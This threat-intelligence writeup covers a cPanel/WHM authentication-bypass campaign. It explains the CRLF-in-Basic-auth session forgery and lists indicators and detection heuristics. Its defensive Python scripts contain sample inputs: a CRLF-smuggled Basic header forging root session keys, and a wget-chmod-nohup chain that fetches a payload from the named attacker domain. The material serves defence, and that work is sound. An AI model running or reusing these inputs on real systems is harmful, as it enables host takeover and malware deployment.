
Mr_Rot13 cPanel CVE-2026-41940 backdoor campaign

Summary

Mr_Rot13 is QiAnXin XLab's name for a long-running threat cluster exploiting CVE-2026-41940, a critical unauthenticated authentication-bypass vulnerability in cPanel & WHM. XLab says the flaw allows remote attackers to take over affected cPanel / WHM panels without credentials and that, after public disclosure on 2026-04-28, more than 2,000 attacker source IPs were observed participating in automated exploitation and cybercrime activity against the vulnerability.

The durable threat-intelligence value is control-plane takeover of shared-hosting infrastructure. XLab's Mr_Rot13 sample chain turns cPanel compromise into persistent host access by changing passwords, adding SSH keys, planting PHP webshells, injecting credential-harvesting JavaScript into login pages, deploying a cross-platform filemanager remote-control trojan, and reporting credentials/device data to attacker-controlled infrastructure.

Why this matters

  • cPanel / WHM is often the administrative root of shared-hosting environments; one panel takeover can expose many sites, databases, mailboxes, deployment secrets, and customer credentials.
  • The exploit boundary is severe: XLab describes CVE-2026-41940 as unauthenticated and remotely reachable, with administrator-level panel takeover possible without a password.
  • XLab observed broad exploitation by multiple criminal groups, including mining, ransomware, botnet propagation, backdoor implantation, and data theft activity.
  • Mr_Rot13's payload is not just a one-shot shell. It layers SSH-key persistence, PHP webshell access, login-page JavaScript theft, password changes, and a remote-control file manager.
  • Infrastructure and sample links reach back to at least 2020, suggesting a stable operator with years of low-detection activity rather than a transient opportunistic copycat.

Operational characteristics

  • Initial access: exploitation of CVE-2026-41940 against vulnerable cPanel & WHM instances. XLab reports the vulnerability was publicly disclosed on 2026-04-28 and rapidly drew automated exploitation from more than 2,000 source IPs.
  • Affected branches and fixes: cPanel's advisory says the issue affects cPanel & WHM versions after 11.40 and was patched in 11.86.0.41, 11.94.0.28, 11.102.0.39, 11.110.0.97, 11.118.0.63, 11.124.0.35, 11.126.0.54, 11.130.0.19, 11.132.0.29, 11.134.0.20, and 11.136.0.5 or later; WP Squared 136.1.7 and later is also patched.
  • watchTowr root cause analysis: watchTowr's diff-based analysis describes a cPanel & WHM session loading/saving flaw where a pre-authentication whostmgrsession can be minted by a failed /login/?login_only=1 request, then abused by stripping the per-session ,<ob> cookie suffix and using CRLF injection in HTTP Basic credentials to write forged top-level fields into /var/cpanel/sessions/raw/<session>.
  • Forged session fields: watchTowr demonstrated injected session keys such as hasroot=1, tfa_verified=1, user=root, cp_security_token=/cpsess..., and successful_internal_auth_with_timestamp=...; a later token-denied request can cause the forged raw session data to be promoted into the JSON cache and accepted by privileged WHM API paths.
  • Observed impact: XLab cites a community-disclosed incident involving Southeast Asian government and military institutions where attackers reportedly stole about 4.37 GB of sensitive files after exploiting the vulnerability.
  • Downloader stage: the campaign pulled an ELF payload named Update from cp.dene[.]de.com and launched it in the background with nohup, output suppressed.
  • Payload family: XLab captured three similar Update builds. The analyzed May 5 build was a stripped, statically linked 64-bit Linux ELF written in Go, with Turkish-language log strings that read as AI-generated and project naming built around Payload.
  • Persistence and access: the infector changed the root password, installed an SSH public key whose comment field was cpanel-updater, wrote a PHP webshell to /usr/local/cpanel/cgi-sys/cpanel.py, and deployed a filemanager remote-control trojan across multiple OS/architecture builds.
  • Credential theft: the payload injected JavaScript into cPanel login pages and reported collected credentials and host information to attacker-controlled Telegram / web endpoints.
  • Attribution clues: XLab tied the downloader domain, JavaScript C2, and older low-detection PHP backdoor material to wrned[.]com, active since at least 2020. The group name comes from the 0xWR Telegram identity clue and Rot13-obfuscated C2 logic.
  • Operator reaction: after an apparent interaction with the attacker's Telegram bot on 2026-05-04, XLab observed the attackers update samples, replace bot tokens, remove the bot from the group, and later re-add it.

Defender heuristics

  • Treat any vulnerable or recently exposed cPanel / WHM host as potentially compromised, not merely vulnerable; XLab's telemetry indicates mass exploitation after public disclosure.
  • Patch cPanel & WHM to versions that remediate CVE-2026-41940, including the cPanel-listed fixed branches above, and restrict WHM/cPanel administration to trusted networks or VPN paths wherever possible.
  • Review cPanel / WHM access logs for failed login attempts that still set whostmgrsession cookies, immediate follow-on requests carrying URL-decoded or suffix-stripped whostmgrsession values, requests without expected /cpsess.../ security-token prefixes, and suspicious 307 redirects or /json-api/ calls following failed authentication.
  • Inspect /var/cpanel/sessions/raw/ and cPanel session caches for unexpected top-level hasroot, tfa_verified, user, cp_security_token, or successful_internal_auth_with_timestamp values, especially where they appear after CRLF-like line splitting or do not match legitimate authentication timelines.
  • Hunt cPanel, web-server, and shell logs for downloads or execution from cp.dene[.]de.com, wpsock[.]com, and wrned[.]com, plus suspicious wget/curl to a root-owned temporary file followed by chmod and nohup.
  • Inspect /usr/local/cpanel/cgi-sys/ and adjacent cPanel CGI/plugin paths for unexpected Python/PHP webshells such as cpanel.py, adminer.php, or files created near the exploitation window.
  • Review /root/.ssh/authorized_keys, privileged user passwords, cron/systemd persistence, cPanel login templates, and JavaScript served by panel login pages for unauthorized additions.
  • Search for unexpected filemanager binaries or architecture-specific payload names on Linux, Windows, and macOS hosts used for hosting administration.
  • Preserve /var/cpanel/logs, /usr/local/cpanel/logs, authentication logs, shell history, process listings, web roots, cPanel plugin files, and memory/process evidence before cleanup.
  • After confirmed compromise, rotate WHM/cPanel credentials, root passwords, SSH keys, database credentials, mail credentials, deployment tokens, CMS secrets, API keys, and any customer/site secrets reachable from the hosting node.
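The session-forgery path summarized under Operational characteristics (a failed login_only request minting a whostmgrsession, CRLF inside Basic credentials, forged top-level keys promoted into the session cache) and the log and session-file review bullets above reduce to a few mechanical checks. The script below is an added triage example, not code from XLab, watchTowr or cPanel: the Apache-style access-log layout, the key=value layout of raw session files, and the idea of feeding it Authorization header values captured by a proxy, WAF or pcap are my assumptions, and every sample input is constructed.

```python
"""Triage helpers for the session-forgery path described above.
Assumed formats (mine, not cPanel's or watchTowr's): Apache-style access-log
lines, newline-separated key=value raw session files, and Authorization header
values captured by a proxy/WAF/pcap since the stock access log omits headers."""
import base64
import re
from collections import defaultdict
from datetime import datetime

# Keys watchTowr reported as forged. Real root sessions carry some of them too,
# so every hit is a lead to correlate with the authentication timeline.
FORGED_KEYS = {"hasroot", "tfa_verified", "user", "cp_security_token",
               "successful_internal_auth_with_timestamp"}
PRIVILEGED_PREFIXES = ("/json-api/", "/xml-api/", "/scripts")
TOKEN_RE = re.compile(r"^/cpsess\d+")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def basic_auth_crlf(header_value):
    """Decode a Basic header value to (user, password, injected); injected is
    True when the credential carries CR or LF, the channel watchTowr describes
    for smuggling key=value lines into the raw session. None if not Basic."""
    if not header_value.lower().startswith("basic "):
        return None
    try:
        raw = base64.b64decode(header_value[6:].strip(), validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = raw.partition(":")
    return user, password, ("\r" in raw or "\n" in raw)


def scan_raw_session(text):
    """Report privileged fields, duplicated keys and CR residue in one session.
    A successful injection leaves a second copy of a key (legitimate plus
    forged) and, depending on line-ending handling, stray carriage returns."""
    privileged, cr_lines, counts = [], [], defaultdict(int)
    for lineno, line in enumerate(text.split("\n"), 1):
        if line.endswith("\r"):
            cr_lines.append(lineno)
            line = line[:-1]
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        counts[key] += 1
        if key in FORGED_KEYS:
            privileged.append((key, value))
    return {"privileged": privileged,
            "duplicates": sorted(k for k, n in counts.items() if n > 1),
            "cr_lines": cr_lines}


def find_bypass_sequences(lines, window_s=300):
    """Per source IP, pair a failed /login/?login_only=1 with a later request
    inside window_s that is either a privileged WHM call without the
    /cpsessNNN/ security-token prefix or a 307 redirect. Clients using WHM
    API tokens also hit /json-api/ without cpsess, so allow-list those first."""
    hits, last_failed = [], {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["path"], int(m["status"])
        ts = datetime.strptime(m["ts"], TS_FMT)
        if path.startswith("/login/") and "login_only=1" in path and status in (401, 403):
            last_failed[ip] = ts
            continue
        failed_at = last_failed.get(ip)
        if failed_at is None or (ts - failed_at).total_seconds() > window_s:
            continue
        untokened = not TOKEN_RE.match(path)
        if untokened and path.startswith(PRIVILEGED_PREFIXES):
            hits.append((ip, path, "untokened privileged request after failed login"))
        elif status == 307:
            hits.append((ip, path, "307 redirect after failed login"))
    return hits


# Constructed sample inputs, not real telemetry.
SAMPLE_BASIC = "Basic " + base64.b64encode(b"foo\r\nhasroot=1\r\nuser=root:bar").decode()
SAMPLE_SESSION = "user=foo\r\nhasroot=1\r\ntfa_verified=1\r\nuser=root\n"
SAMPLE_LOG = [
    '203.0.113.9 - - [05/May/2026:10:00:01 +0000] "GET /login/?login_only=1 HTTP/1.1" 401 0',
    '203.0.113.9 - - [05/May/2026:10:00:03 +0000] "GET /json-api/listaccts?api.version=1 HTTP/1.1" 200 8123',
    '198.51.100.4 - root [05/May/2026:10:02:00 +0000] "GET /cpsess2946011231/json-api/listaccts?api.version=1 HTTP/1.1" 200 8123',
]
```

Run find_bypass_sequences over the real access log (adjust LOG_RE and TS_FMT to the installed format first) and scan_raw_session over each file in /var/cpanel/sessions/raw/; the functions return leads, not verdicts, because a legitimate root session also carries user=root and hasroot=1, and API-token clients legitimately call /json-api/ without a cpsess prefix.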
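For the host-side hunting bullets (authorized_keys additions labelled cpanel-updater, webshells under cgi-sys, wget/curl followed by chmod and nohup, and the XLab IOC domains), an added example in the same vein, not the page's, XLab's or cPanel's code. The inputs are constructed; the standard OpenSSH authorized_keys layout, one-command-per-line shell history, and a caller-supplied (name, mtime) inventory of cgi-sys are my assumptions, and the expected-file set and exploitation window are placeholders to replace with your own.

```python
"""Post-compromise hunt for the Mr_Rot13 persistence artefacts listed above,
run over constructed inputs. Assumptions of mine: authorized_keys lines use the
standard OpenSSH layout, shell history is one command per line, and the
cgi-sys inventory is handed in as (name, mtime) pairs by the caller."""
import base64
import hashlib
import re
import shlex
from datetime import datetime, timezone

IOC_DOMAINS = ("cp.dene[.]de.com", "wpsock[.]com", "wrned[.]com")  # defanged, per XLab
IOC_KEY_COMMENTS = ("cpanel-updater",)
IOC_FILES = ("cpanel.py", "adminer.php")
KEY_TYPE_RE = re.compile(r"^(ssh-|ecdsa-sha2-|sk-)")


def refang(domain):
    return domain.replace("[.]", ".")


def audit_authorized_keys(text, known_fingerprints=frozenset()):
    """Return (type, SHA256 fingerprint, comment, reason) for each key that is
    not in known_fingerprints or carries a comment seen in the campaign. The
    fingerprint is computed the way OpenSSH does, so it can be matched against
    ssh-keygen -lf output from a known-good inventory."""
    out = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        while fields and not KEY_TYPE_RE.match(fields[0]):
            fields.pop(0)  # skip leading options such as from="..." or command="..."
        if len(fields) < 2:
            continue
        ktype, blob, comment = fields[0], fields[1], " ".join(fields[2:])
        try:
            digest = hashlib.sha256(base64.b64decode(blob, validate=True)).digest()
        except ValueError:
            out.append((ktype, "", comment, "undecodable key blob"))
            continue
        fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
        if any(c in comment for c in IOC_KEY_COMMENTS):
            out.append((ktype, fp, comment, "campaign key comment"))
        elif fp not in known_fingerprints:
            out.append((ktype, fp, comment, "fingerprint not in known-good set"))
    return out


def hunt_history(lines):
    """Flag commands touching IOC domains and wget/curl -> chmod -> nohup chains
    on the same path, the downloader pattern XLab describes."""
    domains = tuple(refang(d) for d in IOC_DOMAINS)
    findings, fetched, chmodded = [], set(), set()
    for n, cmd in enumerate(lines, 1):
        if any(d in cmd for d in domains):
            findings.append((n, "IOC domain", cmd))
        try:
            argv = shlex.split(cmd)
        except ValueError:
            continue
        if not argv:
            continue
        tool = argv[0]
        if tool in ("wget", "curl"):
            flag = "-O" if tool == "wget" else "-o"  # output-path flag per tool
            if flag in argv and argv.index(flag) + 1 < len(argv):
                fetched.add(argv[argv.index(flag) + 1])
        elif tool == "chmod" and len(argv) >= 3 and argv[-1] in fetched:
            chmodded.add(argv[-1])
        elif tool == "nohup" and len(argv) >= 2 and argv[1] in chmodded:
            findings.append((n, "download->chmod->nohup chain", argv[1]))
    return findings


def unexpected_cgi_sys(entries, expected, window_start, window_end):
    """entries: (filename, mtime) pairs. Flag campaign webshell names, files
    missing from the expected inventory, and files touched in the window."""
    hits = []
    for name, mtime in entries:
        if name in IOC_FILES:
            hits.append((name, "known campaign webshell name"))
        elif name not in expected:
            hits.append((name, "not in expected cgi-sys inventory"))
        elif window_start <= mtime <= window_end:
            hits.append((name, "modified inside exploitation window"))
    return hits


# Constructed sample inputs (no real keys, hosts or telemetry).
def _fake_ed25519(seed):
    return base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00 " + seed * 32).decode()


SAMPLE_KEYS = (
    f"ssh-ed25519 {_fake_ed25519(b'x')} admin@bastion\n"
    f"ssh-ed25519 {_fake_ed25519(b'y')} cpanel-updater\n"
)
SAMPLE_HISTORY = [
    "cd /tmp",
    f"wget -q -O /tmp/Update http://{refang(IOC_DOMAINS[0])}/Update",
    "chmod +x /tmp/Update",
    "nohup /tmp/Update >/dev/null 2>&1 &",
]
UTC = timezone.utc
WINDOW = (datetime(2026, 4, 28, tzinfo=UTC), datetime(2026, 5, 10, tzinfo=UTC))
SAMPLE_CGI_SYS = [
    ("FormMail.cgi", datetime(2025, 11, 2, tzinfo=UTC)),
    ("cpanel.py", datetime(2026, 5, 5, tzinfo=UTC)),
    ("helper.cgi", datetime(2026, 5, 6, tzinfo=UTC)),
]
EXPECTED_CGI_SYS = {"FormMail.cgi", "helper.cgi"}
```

Feed audit_authorized_keys the contents of /root/.ssh/authorized_keys together with fingerprints from your key inventory, hunt_history the root and admin shell histories, and unexpected_cgi_sys a listing of /usr/local/cpanel/cgi-sys/ with mtimes; the comment-based key match only catches the exact label XLab reported, so the fingerprint allow-list is the check that survives an operator renaming the key.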

Sources

  • QiAnXin XLab: https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
  • cPanel advisory: https://support.cpanel.net/hc/en-us/articles/40073787579671-Critical-Vulnerability-with-cPanel-WHM-Login-Authentication
  • watchTowr technical analysis: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
  • CVE record: https://www.cve.org/CVERecord?id=CVE-2026-41940